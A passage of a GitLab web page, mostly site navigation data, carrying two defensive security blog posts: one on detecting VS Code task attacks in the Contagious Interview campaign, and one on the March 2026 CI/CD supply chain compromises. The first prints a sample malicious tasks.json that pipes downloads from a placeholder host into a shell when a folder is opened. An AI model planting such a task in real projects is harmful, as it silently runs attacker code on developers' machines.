Compliance",{"href":146,"dataGaName":147,"dataGaLocation":44},"/solutions/software-compliance/","software compliance",{"title":149,"link":150,"items":155},"Measurement",{"config":151},{"icon":152,"href":153,"dataGaName":154,"dataGaLocation":44},"DigitalTransformation","/solutions/visibility-measurement/","visibility and measurement",[156,160,164],{"text":157,"config":158},"Visibility & Measurement",{"href":153,"dataGaLocation":44,"dataGaName":159},"Visibility and Measurement",{"text":161,"config":162},"Value Stream Management",{"href":163,"dataGaLocation":44,"dataGaName":161},"/solutions/value-stream-management/",{"text":165,"config":166},"Analytics & Insights",{"href":167,"dataGaLocation":44,"dataGaName":168},"/solutions/analytics-and-insights/","Analytics and insights",{"title":170,"type":95,"items":171},"GitLab for",[172,178,184],{"text":173,"config":174},"Enterprise",{"icon":175,"href":176,"dataGaLocation":44,"dataGaName":177},"Building","/enterprise/","enterprise",{"text":179,"config":180},"Small Business",{"icon":181,"href":182,"dataGaLocation":44,"dataGaName":183},"Work","/small-business/","small business",{"text":185,"config":186},"Public Sector",{"icon":187,"href":188,"dataGaLocation":44,"dataGaName":189},"Organization","/solutions/public-sector/","public sector",{"text":191,"config":192},"Pricing",{"href":193,"dataGaName":194,"dataGaLocation":44,"dataNavLevelOne":194},"/pricing/","pricing",{"text":196,"config":197,"menu":199},"Resources",{"dataNavLevelOne":198},"resources",{"type":95,"link":200,"columns":204,"feature":288},{"text":201,"config":202},"View all resources",{"href":203,"dataGaName":198,"dataGaLocation":44},"/resources/",[205,238,260],{"title":206,"items":207},"Getting started",[208,213,218,223,228,233],{"text":209,"config":210},"Install",{"href":211,"dataGaName":212,"dataGaLocation":44},"/install/","install",{"text":214,"config":215},"Quick start guides",{"href":216,"dataGaName":217,"dataGaLocation":44},"/get-started/","quick setup 
checklists",{"text":219,"config":220},"Learn",{"href":221,"dataGaLocation":44,"dataGaName":222},"https://university.gitlab.com/","learn",{"text":224,"config":225},"Product documentation",{"href":226,"dataGaName":227,"dataGaLocation":44},"https://docs.gitlab.com/","product documentation",{"text":229,"config":230},"Best practice videos",{"href":231,"dataGaName":232,"dataGaLocation":44},"/getting-started-videos/","best practice videos",{"text":234,"config":235},"Integrations",{"href":236,"dataGaName":237,"dataGaLocation":44},"/integrations/","integrations",{"title":239,"items":240},"Discover",[241,246,251,255],{"text":242,"config":243},"Customer success stories",{"href":244,"dataGaName":245,"dataGaLocation":44},"/customers/","customer success stories",{"text":247,"config":248},"Blog",{"href":249,"dataGaName":250,"dataGaLocation":44},"/blog/","blog",{"text":252,"config":253},"The Source",{"href":254,"dataGaName":250,"dataGaLocation":44},"/the-source/",{"text":256,"config":257},"Remote",{"href":258,"dataGaName":259,"dataGaLocation":44},"https://handbook.gitlab.com/handbook/company/culture/all-remote/","remote",{"title":261,"items":262},"Connect",[263,268,273,278,283],{"text":264,"config":265},"GitLab Services",{"href":266,"dataGaName":267,"dataGaLocation":44},"/services/","services",{"text":269,"config":270},"Community",{"href":271,"dataGaName":272,"dataGaLocation":44},"/community/","community",{"text":274,"config":275},"Forum",{"href":276,"dataGaName":277,"dataGaLocation":44},"https://forum.gitlab.com/","forum",{"text":279,"config":280},"Events",{"href":281,"dataGaName":282,"dataGaLocation":44},"/events/","events",{"text":284,"config":285},"Partners",{"href":286,"dataGaName":287,"dataGaLocation":44},"/partners/","partners",{"config":289,"title":292,"text":293,"link":294},{"background":290,"textColor":291},"url('https://res.cloudinary.com/about-gitlab-com/image/upload/v1777322348/qpq8yrgn8knii57omj0c.png')","#000","What’s new in GitLab","Stay updated with our latest 
features and improvements.",{"text":295,"config":296},"Read the latest",{"href":297,"dataGaName":298,"dataGaLocation":44},"/releases/whats-new/","whats new",{"text":300,"config":301,"menu":303},"Company",{"dataNavLevelOne":302},"company",{"type":95,"columns":304},[305],{"items":306},[307,312,318,320,325,330,335,340,345,350,355],{"text":308,"config":309},"About",{"href":310,"dataGaName":311,"dataGaLocation":44},"/company/","about",{"text":313,"config":314,"footerGa":317},"Jobs",{"href":315,"dataGaName":316,"dataGaLocation":44},"/jobs/","jobs",{"dataGaName":316},{"text":279,"config":319},{"href":281,"dataGaName":282,"dataGaLocation":44},{"text":321,"config":322},"Leadership",{"href":323,"dataGaName":324,"dataGaLocation":44},"/company/team/e-group/","leadership",{"text":326,"config":327},"Team",{"href":328,"dataGaName":329,"dataGaLocation":44},"/company/team/","team",{"text":331,"config":332},"Handbook",{"href":333,"dataGaName":334,"dataGaLocation":44},"https://handbook.gitlab.com/","handbook",{"text":336,"config":337},"Investor relations",{"href":338,"dataGaName":339,"dataGaLocation":44},"https://ir.gitlab.com/","investor relations",{"text":341,"config":342},"Trust Center",{"href":343,"dataGaName":344,"dataGaLocation":44},"/security/","trust center",{"text":346,"config":347},"AI Transparency Center",{"href":348,"dataGaName":349,"dataGaLocation":44},"/ai-transparency-center/","ai transparency center",{"text":351,"config":352},"Newsletter",{"href":353,"dataGaName":354,"dataGaLocation":44},"/company/contact/#contact-forms","newsletter",{"text":356,"config":357},"Press",{"href":358,"dataGaName":359,"dataGaLocation":44},"/press/","press",{"text":361,"config":362,"menu":363},"Contact us",{"dataNavLevelOne":302},{"type":95,"columns":364},[365],{"items":366},[367,370,375],{"text":51,"config":368},{"href":53,"dataGaName":369,"dataGaLocation":44},"talk to sales",{"text":371,"config":372},"Support 
portal",{"href":373,"dataGaName":374,"dataGaLocation":44},"https://support.gitlab.com","support portal",{"text":376,"config":377},"Customer portal",{"href":378,"dataGaName":379,"dataGaLocation":44},"https://customers.gitlab.com/customers/sign_in/","customer portal",{"close":381,"login":382,"suggestions":389},"Close",{"text":383,"link":384},"To search repositories and projects, login to",{"text":385,"config":386},"gitlab.com",{"href":58,"dataGaName":387,"dataGaLocation":388},"search login","search",{"text":390,"default":391},"Suggestions",[392,394,398,400,404,408],{"text":75,"config":393},{"href":80,"dataGaName":75,"dataGaLocation":388},{"text":395,"config":396},"Code Suggestions (AI)",{"href":397,"dataGaName":395,"dataGaLocation":388},"/solutions/code-suggestions/",{"text":111,"config":399},{"href":113,"dataGaName":111,"dataGaLocation":388},{"text":401,"config":402},"GitLab on AWS",{"href":403,"dataGaName":401,"dataGaLocation":388},"/partners/technology-partners/aws/",{"text":405,"config":406},"GitLab on Google Cloud",{"href":407,"dataGaName":405,"dataGaLocation":388},"/partners/technology-partners/google-cloud-platform/",{"text":409,"config":410},"Why GitLab?",{"href":88,"dataGaName":409,"dataGaLocation":388},{"freeTrial":412,"mobileIcon":417,"desktopIcon":422,"secondaryButton":425},{"text":413,"config":414},"Start free trial",{"href":415,"dataGaName":49,"dataGaLocation":416},"https://gitlab.com/-/trials/new/","nav",{"altText":418,"config":419},"Gitlab Icon",{"src":420,"dataGaName":421,"dataGaLocation":416},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1758203874/jypbw1jx72aexsoohd7x.svg","gitlab icon",{"altText":418,"config":423},{"src":424,"dataGaName":421,"dataGaLocation":416},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1758203875/gs4c8p8opsgvflgkswz9.svg",{"text":426,"config":427},"Get 
Started",{"href":428,"dataGaName":429,"dataGaLocation":416},"https://gitlab.com/-/trial_registrations/new?glm_source=about.gitlab.com/get-started/","get started",{"freeTrial":431,"mobileIcon":435,"desktopIcon":437},{"text":432,"config":433},"Learn more about GitLab Duo",{"href":80,"dataGaName":434,"dataGaLocation":416},"gitlab duo",{"altText":418,"config":436},{"src":420,"dataGaName":421,"dataGaLocation":416},{"altText":418,"config":438},{"src":424,"dataGaName":421,"dataGaLocation":416},{"button":440,"mobileIcon":445,"desktopIcon":447},{"text":441,"config":442},"/switch",{"href":443,"dataGaName":444,"dataGaLocation":416},"#contact","switch",{"altText":418,"config":446},{"src":420,"dataGaName":421,"dataGaLocation":416},{"altText":418,"config":448},{"src":449,"dataGaName":421,"dataGaLocation":416},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1773335277/ohhpiuoxoldryzrnhfrh.png",{"freeTrial":451,"mobileIcon":456,"desktopIcon":458},{"text":452,"config":453},"Back to pricing",{"href":193,"dataGaName":454,"dataGaLocation":416,"icon":455},"back to pricing","GoBack",{"altText":418,"config":457},{"src":420,"dataGaName":421,"dataGaLocation":416},{"altText":418,"config":459},{"src":424,"dataGaName":421,"dataGaLocation":416},{"title":461,"button":462,"config":467},"See how agentic AI transforms software delivery",{"text":463,"config":464},"Sign up for GitLab Transcend on June 10",{"href":465,"dataGaName":466,"dataGaLocation":44},"/releases/whats-new/#sign-up","transcend event",{"layout":468,"icon":469,"disabled":32},"release","AiStar",{"data":471},{"text":472,"source":473,"edit":479,"contribute":484,"config":489,"items":494,"minimal":701},"Git is a trademark of Software Freedom Conservancy and our use of 'GitLab' is under license",{"text":474,"config":475},"View page source",{"href":476,"dataGaName":477,"dataGaLocation":478},"https://gitlab.com/gitlab-com/marketing/digital-experience/about-gitlab-com/","page source","footer",{"text":480,"config":481},"Edit this 
page",{"href":482,"dataGaName":483,"dataGaLocation":478},"https://gitlab.com/gitlab-com/marketing/digital-experience/about-gitlab-com/-/blob/main/content/","web ide",{"text":485,"config":486},"Please contribute",{"href":487,"dataGaName":488,"dataGaLocation":478},"https://gitlab.com/gitlab-com/marketing/digital-experience/about-gitlab-com/-/blob/main/CONTRIBUTING.md/","please contribute",{"twitter":490,"facebook":491,"youtube":492,"linkedin":493},"https://twitter.com/gitlab","https://www.facebook.com/gitlab","https://www.youtube.com/channel/UCnMGQ8QHMAnVIsI3xJrihhg","https://www.linkedin.com/company/gitlab-com",[495,542,596,640,667],{"title":191,"links":496,"subMenu":511},[497,501,506],{"text":498,"config":499},"View plans",{"href":193,"dataGaName":500,"dataGaLocation":478},"view plans",{"text":502,"config":503},"Why Premium?",{"href":504,"dataGaName":505,"dataGaLocation":478},"/pricing/premium/","why premium",{"text":507,"config":508},"Why Ultimate?",{"href":509,"dataGaName":510,"dataGaLocation":478},"/pricing/ultimate/","why ultimate",[512],{"title":513,"links":514},"Contact Us",[515,518,520,522,527,532,537],{"text":516,"config":517},"Contact sales",{"href":53,"dataGaName":54,"dataGaLocation":478},{"text":371,"config":519},{"href":373,"dataGaName":374,"dataGaLocation":478},{"text":376,"config":521},{"href":378,"dataGaName":379,"dataGaLocation":478},{"text":523,"config":524},"Status",{"href":525,"dataGaName":526,"dataGaLocation":478},"https://status.gitlab.com/","status",{"text":528,"config":529},"Terms of use",{"href":530,"dataGaName":531,"dataGaLocation":478},"/terms/","terms of use",{"text":533,"config":534},"Privacy statement",{"href":535,"dataGaName":536,"dataGaLocation":478},"/privacy/","privacy statement",{"text":538,"config":539},"Cookie preferences",{"dataGaName":540,"dataGaLocation":478,"id":541,"isOneTrustButton":13},"cookie preferences","ot-sdk-btn",{"title":91,"links":543,"subMenu":552},[544,548],{"text":545,"config":546},"DevSecOps 
platform",{"href":73,"dataGaName":547,"dataGaLocation":478},"devsecops platform",{"text":549,"config":550},"AI-Assisted Development",{"href":80,"dataGaName":551,"dataGaLocation":478},"ai-assisted development",[553],{"title":554,"links":555},"Topics",[556,561,566,571,576,581,586,591],{"text":557,"config":558},"CICD",{"href":559,"dataGaName":560,"dataGaLocation":478},"/topics/ci-cd/","cicd",{"text":562,"config":563},"GitOps",{"href":564,"dataGaName":565,"dataGaLocation":478},"/topics/gitops/","gitops",{"text":567,"config":568},"DevOps",{"href":569,"dataGaName":570,"dataGaLocation":478},"/topics/devops/","devops",{"text":572,"config":573},"Version Control",{"href":574,"dataGaName":575,"dataGaLocation":478},"/topics/version-control/","version control",{"text":577,"config":578},"DevSecOps",{"href":579,"dataGaName":580,"dataGaLocation":478},"/topics/devsecops/","devsecops",{"text":582,"config":583},"Cloud Native",{"href":584,"dataGaName":585,"dataGaLocation":478},"/topics/cloud-native/","cloud native",{"text":587,"config":588},"AI for Coding",{"href":589,"dataGaName":590,"dataGaLocation":478},"/topics/devops/ai-for-coding/","ai for coding",{"text":592,"config":593},"Agentic AI",{"href":594,"dataGaName":595,"dataGaLocation":478},"/topics/agentic-ai/","agentic ai",{"title":597,"links":598},"Solutions",[599,601,603,608,612,615,619,622,624,627,630,635],{"text":135,"config":600},{"href":130,"dataGaName":135,"dataGaLocation":478},{"text":124,"config":602},{"href":107,"dataGaName":108,"dataGaLocation":478},{"text":604,"config":605},"Agile development",{"href":606,"dataGaName":607,"dataGaLocation":478},"/solutions/agile-delivery/","agile delivery",{"text":609,"config":610},"SCM",{"href":120,"dataGaName":611,"dataGaLocation":478},"source code management",{"text":557,"config":613},{"href":113,"dataGaName":614,"dataGaLocation":478},"continuous integration & delivery",{"text":616,"config":617},"Value stream management",{"href":163,"dataGaName":618,"dataGaLocation":478},"value stream 
management",{"text":562,"config":620},{"href":621,"dataGaName":565,"dataGaLocation":478},"/solutions/gitops/",{"text":173,"config":623},{"href":176,"dataGaName":177,"dataGaLocation":478},{"text":625,"config":626},"Small business",{"href":182,"dataGaName":183,"dataGaLocation":478},{"text":628,"config":629},"Public sector",{"href":188,"dataGaName":189,"dataGaLocation":478},{"text":631,"config":632},"Education",{"href":633,"dataGaName":634,"dataGaLocation":478},"/solutions/education/","education",{"text":636,"config":637},"Financial services",{"href":638,"dataGaName":639,"dataGaLocation":478},"/solutions/finance/","financial services",{"title":196,"links":641},[642,644,646,648,651,653,655,657,659,661,663,665],{"text":209,"config":643},{"href":211,"dataGaName":212,"dataGaLocation":478},{"text":214,"config":645},{"href":216,"dataGaName":217,"dataGaLocation":478},{"text":219,"config":647},{"href":221,"dataGaName":222,"dataGaLocation":478},{"text":224,"config":649},{"href":226,"dataGaName":650,"dataGaLocation":478},"docs",{"text":247,"config":652},{"href":249,"dataGaName":250,"dataGaLocation":478},{"text":242,"config":654},{"href":244,"dataGaName":245,"dataGaLocation":478},{"text":256,"config":656},{"href":258,"dataGaName":259,"dataGaLocation":478},{"text":264,"config":658},{"href":266,"dataGaName":267,"dataGaLocation":478},{"text":269,"config":660},{"href":271,"dataGaName":272,"dataGaLocation":478},{"text":274,"config":662},{"href":276,"dataGaName":277,"dataGaLocation":478},{"text":279,"config":664},{"href":281,"dataGaName":282,"dataGaLocation":478},{"text":284,"config":666},{"href":286,"dataGaName":287,"dataGaLocation":478},{"title":300,"links":668},[669,671,673,675,677,679,681,685,690,692,694,696],{"text":308,"config":670},{"href":310,"dataGaName":302,"dataGaLocation":478},{"text":313,"config":672},{"href":315,"dataGaName":316,"dataGaLocation":478},{"text":321,"config":674},{"href":323,"dataGaName":324,"dataGaLocation":478},{"text":326,"config":676},{"href":328,"dataGaN
ame":329,"dataGaLocation":478},{"text":331,"config":678},{"href":333,"dataGaName":334,"dataGaLocation":478},{"text":336,"config":680},{"href":338,"dataGaName":339,"dataGaLocation":478},{"text":682,"config":683},"Sustainability",{"href":684,"dataGaName":682,"dataGaLocation":478},"/sustainability/",{"text":686,"config":687},"Diversity, inclusion and belonging (DIB)",{"href":688,"dataGaName":689,"dataGaLocation":478},"/diversity-inclusion-belonging/","Diversity, inclusion and belonging",{"text":341,"config":691},{"href":343,"dataGaName":344,"dataGaLocation":478},{"text":351,"config":693},{"href":353,"dataGaName":354,"dataGaLocation":478},{"text":356,"config":695},{"href":358,"dataGaName":359,"dataGaLocation":478},{"text":697,"config":698},"Modern Slavery Transparency Statement",{"href":699,"dataGaName":700,"dataGaLocation":478},"https://handbook.gitlab.com/handbook/legal/modern-slavery-act-transparency-statement/","modern slavery transparency statement",{"items":702},[703,706,709],{"text":704,"config":705},"Terms",{"href":530,"dataGaName":531,"dataGaLocation":478},{"text":707,"config":708},"Cookies",{"dataGaName":540,"dataGaLocation":478,"id":541,"isOneTrustButton":13},{"text":710,"config":711},"Privacy",{"href":535,"dataGaName":536,"dataGaLocation":478},[713],{"id":714,"title":9,"body":26,"config":715,"content":717,"description":26,"extension":25,"meta":722,"navigation":13,"path":723,"seo":724,"stem":725,"__hash__":726},"blogAuthors/en-us/blog/authors/evan-baltman.yml",{"template":716},"BlogAuthor",{"name":9,"config":718},{"headshot":719,"socialProof":720},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1777579628/fkgn1kh0c1ndgba9yrkq.png",{"gitlabHandle":721},"ebaltman",{},"/en-us/blog/authors/evan-baltman",{},"en-us/blog/authors/evan-baltman","lIHS0uxztwtRrA-cy594VFaaYQp9r_oqQeUFF1B8eTU",[728,742,754],{"content":729,"config":740},{"title":730,"description":731,"authors":732,"heroImage":734,"date":735,"body":736,"category":11,"tags":737},"How to detect 
and prevent Contagious Interview IDE attacks","Learn how we built custom controls that detect and prevent malware campaigns like those used for Contagious Interview and how to deploy them in your environment.",[733],"Josh Feehs","https://res.cloudinary.com/about-gitlab-com/image/upload/v1774375772/kpaaaiqhokevxxeoxvu0.png","2026-05-04","Recently, GitLab's Threat Intelligence team, part of the Security Operations team, published an [extensive article](https://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/) revealing North Korean tradecraft and detailing ways in which GitLab has tracked and disrupted these malicious actors. Security Operations here also includes our Security Incident Response Team (SIRT), Security Logging, Signals Intelligence, and Red Team. This tight collaboration across security disciplines allows us to take tips from threat intelligence, emulate relevant threat actors via Red and Purple Team exercises, and proactively build detection and prevention techniques based on that activity.\n\nSo, in parallel with the discovery of the North Korean tradecraft and associated [Contagious Interview](https://attack.mitre.org/groups/G1052/) threat campaign, we developed custom controls to prevent similar malware campaigns, specifically those which use IDE attacks. In this article, we share those controls as well as the techniques we use to protect our customers, support the broader security community, and further thwart these malicious actors.\n\n## The threat intelligence\n\nThe North Korean tradecraft article focused on a broad set of attacks, techniques, and Indicators of Compromise (IOCs) that North Korean state actors are actively using to conduct both broad and targeted attacks. One of [the attack paths noted](https://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/#_2025-campaign-trends) was the use of Visual Studio Code tasks for malware distribution. 
The [Contagious Interview](https://attack.mitre.org/groups/G1052/) threat campaign often relies on fake interview processes to convince its victims to download and open a code repository, enabling an attack via VS Code tasks.\n\n[VS Code tasks](https://code.visualstudio.com/docs/debugtest/tasks) are a mechanism designed to automate common jobs that developers want to run when opening a repository, such as linting, building, packaging, testing, or deploying software systems. Via a simple configuration file within the repo, `tasks.json`, developers can automatically run code whenever they open their repository. Trust must be granted to the repository for these tasks to run.\n\nContagious Interview’s pretexts often rely on malicious repositories, so pivoting to VS Code tasks for code execution is a simple continuation of that pretext. The target is prompted to download and open the malicious repository in VS Code (often for code review purposes as part of an interview). Because victims believe they are interviewing for a job, they are under heavy pressure to “trust” the interviewer’s workspace, enabling the malicious task to run without their knowledge.\n\nOne example of a malicious `tasks.json` file is shown below. It is fairly simple: it detects the OS and downloads the next stage of the malware for that platform, piping the download straight into a shell in the style of `curl | bash`. Domains included are placeholders and not actual IOCs. 
Detailed IOCs for these actors were shared in our [previous blog post](https://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/#appendix-2-indicators-of-compromise).\n\n\n```json\n  \"version\": \"1.0.8\",\n  \"tasks\": [\n    {\n      \"label\": \"env\",\n      \"type\": \"shell\",\n      \"osx\": {\n        \"command\": \"curl 'https://www.example[.]com/settings/mac?flag=8' | bash\"\n      },\n      \"linux\": {\n        \"command\": \"wget -q0- 'https://www.example[.]com/settings/linux?flag=8' | sh\"\n      },\n      \"windows\": {\n        \"command\": \"curl https://www.example[.]com/settings/windows?flag=8 | cmd\"\n      },\n      \"problemMatcher\": [],\n      \"presentation\": {\n        \"reveal\": \"never\",\n        \"echo\": false,\n        \"focus\": false,\n        \"close\": true,\n        \"panel\": \"dedicated\",\n        \"showReuseMessage\": false\n      },\n      \"runOptions\": {\n        \"runOn\": \"folderOpen\"\n      }\n    }\n  ]\n```\n\nThis malicious code execution is then typically used to deploy infostealers, steal passwords and cryptocurrency, and ultimately establish persistence to abuse victims’ trusted accesses to corporate networks.\n\nOnce we understood how the threat actor was gaining initial code execution, we had a target for preventative measures to catch these attacks before GitLab workstations were targeted.\n\n## Multi-faceted detection and prevention\n\nWe always want to develop detective and preventative controls that are as “low level” as possible, since these types of detections are typically more difficult to bypass. Additionally, threat intelligence indicated that other projects that forked VS Code are also vulnerable to this malicious repository attack. So, instead of focusing specifically on a VS Code detection, we wanted to find the area “closest to the operating system” where this malicious code execution could be identified. 
This would allow our detection techniques to detect not only exploitation via VS Code tasks, but also attacks that use a VS Code fork or a similar IDE written in Node that has background tasks.\n\nReviewing VS Code source, we identified that the `node-pty.spawn()` library call is used across the product when subprocesses need to be spawned. The [node-pty library](https://www.npmjs.com/package/node-pty) is incredibly popular, with over a million weekly downloads at time of writing. This library enables Node applications (including Electron applications such as VS Code) to fork subprocesses from a Node context, and results in calls to its own binary, `spawn-helper`. When subprocesses are launched, `spawn-helper` is spawned as a child process of the Node application calling it.\n\nAfter performing a Purple Team operation to emulate this specific attack path, we reviewed our Endpoint Detection and Response (EDR) telemetry, both to develop a strong detection for the emulated attack and to tune that detection to alert only on suspicious activity, not on legitimate developer activity. We identified that `spawn-helper` is called in situations where VS Code wants to spawn tasks that occur in the *background*, without user visibility or interaction. Conversely, a `Code Helper` binary is called when new processes (such as the integrated Terminal) are launched in the *foreground* with user interaction.\n\nThis allows us to craft detections that only look for subprocesses spawned without the user’s knowledge, and avoid false positives that flag subprocesses a user might intentionally spawn while using their IDE.\n\nAs shown earlier, a commonly seen malicious task runs a `curl | \u003Cshell>` pipeline. Although `curl | bash` can be a legitimate way to install software like Homebrew, in our environment, it should never happen in the background without the user’s knowledge. 
This distinction allowed us to tune `spawn-helper`\\-based detections to not alert on *every* background task that ran, but to instead trigger only on behaviors that are uncommon and suspicious in our environment. Since implementing this detection technique, we have had no false positives, even though a large part of our organization uses VS Code daily.\n\nAlthough this article has focused on detecting `spawn-helper` in your environment, this is only one of many layers of defense that you can implement in your organization to prevent and detect these IDE task-based attacks.\n\nIn addition to using EDR instrumentation to detect a malicious task at runtime, you can proactively harden your fleet against this type of attack by pushing global configs to disable task runs in VS Code. If that is too disruptive to your developers, you can also scan your environment to enumerate how often users use trusted workspaces and trusted workspace folders within their typical VS Code usage, and run education campaigns to help inform the company about the risks posed by this Contagious Interview attack path.\n\n## Summary\n\nGitLab Security Operations works around the clock to protect our customers and our company. With our tightly coupled security teams, we are able to produce actionable threat intelligence, leverage that threat intel to inform adversary emulation operations, and ultimately develop technical and procedural prevention and detection techniques that protect our customers and company.\n\nAs VS Code tasks continue to receive visibility in the security community, it’s possible that other threat actors will attempt to use this attack path for their own ends. We hope that this small example of the work we do to protect GitLab and our customers against Advanced Persistent Threats can inspire others to do the same, and to join us in our continued mission to disrupt these threat actors. 
\n\n> Follow our innovation and research on our [Security Labs site](https://about.gitlab.com/blog/categories/security-labs/).",[22,23,738,739],"product","tutorial",{"featured":32,"template":14,"slug":741},"how-to-detect-and-prevent-contagious-interview-ide-attacks",{"content":743,"config":752},{"body":744,"title":745,"description":746,"category":11,"tags":747,"authors":748,"heroImage":750,"date":751},"\n***Note: The GitLab product did not use any of the compromised package versions mentioned in this post.***\n\nIn the span of 12 days, four separate supply chain attacks revealed that continuous integration and continuous delivery (CI/CD) pipelines have become a high-value target for sophisticated threat actors.\n\nBetween March 19 and March 31, 2026, threat actors compromised:\n\n* an open-source security scanner (Trivy)\n* an infrastructure-as-code (IaC) security scanner (Checkmarx KICS)\n* an AI model gateway (LiteLLM)\n* a JavaScript HTTP client (axios)\n\nEach attack shared the same surface: the build pipeline.\nThis article shows [what happened](#trusted-by-millions-compromised-in-minutes), [why pipelines can be uniquely vulnerable](#the-patterns-behind-these-attacks), and how centralized policy enforcement with GitLab — using policies defined below — can [block, detect, and contain these classes of attack](#how-gitlab-pipeline-execution-policies-address-each-attack-pattern) before they reach production.\n\n\n## Trusted by millions, compromised in minutes\n\nHere is the timeline of the supply chain attacks:\n\n### March 19: Trivy security scanner becomes an attack vector\n\n[Trivy](https://github.com/aquasecurity/trivy) is one of the most widely used open-source vulnerability scanners in the world. 
It is the tool teams run *inside their pipelines* to find vulnerabilities.\n\nOn March 19, a threat actor group known as [TeamPCP used compromised credentials](https://www.aquasec.com/blog/trivy-supply-chain-attack-what-you-need-to-know/) to force-push malicious code into 76 of 77 version tags of the `aquasecurity/trivy-action` GitHub Action and all 7 tags of `aquasecurity/setup-trivy`. Simultaneously, they published a trojanized Trivy binary (v0.69.4) to official distribution channels. The payload was credential-stealing malware that harvested environment variables, cloud tokens, SSH keys, and CI/CD secrets from every pipeline that ran a Trivy scan.\n\nThe incident was assigned [CVE-2026-33634](https://nvd.nist.gov/vuln/detail/CVE-2026-33634) with a CVSS score of 9.4. The Cybersecurity and Infrastructure Security Agency (CISA) added it to the Known Exploited Vulnerabilities catalog within days.\n\n### March 23: Checkmarx KICS falls next\nUsing stolen credentials, TeamPCP pivoted to Checkmarx’s open-source KICS (Keeping Infrastructure as Code Secure) project. They compromised the `ast-github-action` and `kics-github-action` GitHub Actions, [injecting the same credential-stealing malware](https://thehackernews.com/2026/03/teampcp-hacks-checkmarx-github-actions.html). Between 12:58 and 16:50 UTC on March 23, any CI/CD pipeline referencing these actions was silently exfiltrating sensitive data, such as API keys, database passwords, cloud access tokens, SSH keys, and service account credentials.\n\n### March 24: LiteLLM compromised via stolen Trivy credentials\n\nLiteLLM, an LLM API proxy with 95 million monthly downloads, was the next target. 
TeamPCP [published backdoored versions](https://thehackernews.com/2026/03/teampcp-backdoors-litellm-versions.html) (1.82.7 and 1.82.8) to PyPI using credentials harvested from LiteLLM’s own CI/CD pipeline, which used Trivy for scanning.\n\nThe malware in version 1.82.7 used a base64-encoded payload injected directly into `litellm/proxy/proxy_server.py` that executed at import time. The malware in version 1.82.8 used a `.pth` file, a Python mechanism that executes automatically during interpreter startup. Simply installing LiteLLM was enough to trigger the payload. Attackers encrypted the stolen data (SSH keys, cloud tokens, .env files, cryptocurrency wallets) and exfiltrated it to `models.litellm.cloud`, a lookalike domain.\n\n### March 31: Source code for AI coding assistant leaked via simple packaging mistake\n\nWhile the TeamPCP campaign was still unfolding, a software company shipped an npm package containing a 59.8 MB source map file, one that referenced its AI coding assistant's complete, unminified TypeScript source code, hosted in the company's own Cloudflare R2 bucket.\n\nThe leak exposed 1,900 TypeScript files, 512,000+ lines of code, 44 hidden feature flags, unreleased model codenames, and the full system prompt for anyone who knew where to look. As engineer [Gabriel Anhaia explained](https://dev.to/gabrielanhaia/claude-codes-entire-source-code-was-just-leaked-via-npm-source-maps-heres-whats-inside-cjo), “A single misconfigured .npmignore or files field in package.json can expose everything.”\n\n### March 31: axios and another trojan in the supply chain\n\nThat same day, a sophisticated campaign [targeted the axios npm package](https://thehackernews.com/2026/03/axios-supply-chain-attack-pushes-cross.html), a JavaScript HTTP client with over 100 million weekly downloads.\n\nA compromised maintainer account published backdoored versions (1.14.1 and 0.30.4). 
It injected a malicious dependency (`plain-crypto-js@4.2.1`) that deployed a Remote Access Trojan capable of running on macOS, Windows, and Linux. Both release branches were hit within 39 minutes, with the malware designed to self-destruct after execution.\n\n## The patterns behind these attacks\n\nAcross these five incidents, three distinct attack patterns emerge, and all of them exploit the implicit trust that CI/CD pipelines place in their inputs.\n\n### Pattern 1: Poisoned tools and actions\n\nThe TeamPCP campaign exploited a fundamental assumption: that the security tools running *inside* your pipeline are themselves trustworthy. When a GitHub Action tag or a PyPI package version resolves to malicious code, the pipeline executes it with full access to environment secrets, cloud credentials, and deployment tokens. There is no verification step because the pipeline trusts the tag.\n\n**A recommended pipeline-level control:** Pin tools and actions to immutable references (commit SHAs or image digests) rather than mutable version tags. Where pinning is not practical, verify the integrity of tools and dependencies against known-good checksums or signatures. Block execution if verification fails.\n\n### Pattern 2: Packaging misconfigurations that leak IP\n\nA misconfigured build pipeline shipped debugging artifacts straight into the production package. A misconfigured `.npmignore` or files field in package.json is all it takes. A pre-publish validation step should catch this every time.\n\n**A recommended pipeline-level control:** Before any package is published, run automated checks that validate the package contents against an allowlist, flag unexpected files (source maps, internal configs, .env files), and block the publish step if the checks fail.\n\n### Pattern 3: Vulnerabilities in transitive dependencies\n\nThe axios attack targeted not just direct users of axios, but anyone whose dependency tree resolved to the compromised version. 
A single poisoned dependency in a lockfile can thus propagate through an entire organization’s build infrastructure.\n\n**A recommended pipeline-level control:** Compare dependency checksums against known-good lockfile state. Detect unexpected new dependencies or version changes. Block builds that introduce unverified packages.\n\n## How GitLab Pipeline Execution Policies address each attack pattern\n\nGitLab Pipeline Execution Policies ([PEPs](https://docs.gitlab.com/user/application_security/policies/pipeline_execution_policies/)) enable security and platform teams to inject mandatory CI/CD jobs into every pipeline across an organization, regardless of what a developer defines in their `.gitlab-ci.yml`. Jobs defined in PEPs cannot be skipped, even with `[skip ci]` or `[no_pipeline]` directives. Jobs can be executed in *reserved* stages (`.pipeline-policy-pre` and `.pipeline-policy-post`) that bookend the developer’s pipeline.\n\nWe have published ready-to-use pipeline execution policies for all three patterns as an open-source project: [Supply Chain Policies](https://gitlab.com/gitlab-org/security-risk-management/security-policies/projects/supply-chain-policies). These policies are independently deployable, and each one ships with violation samples that you can use to test them. 
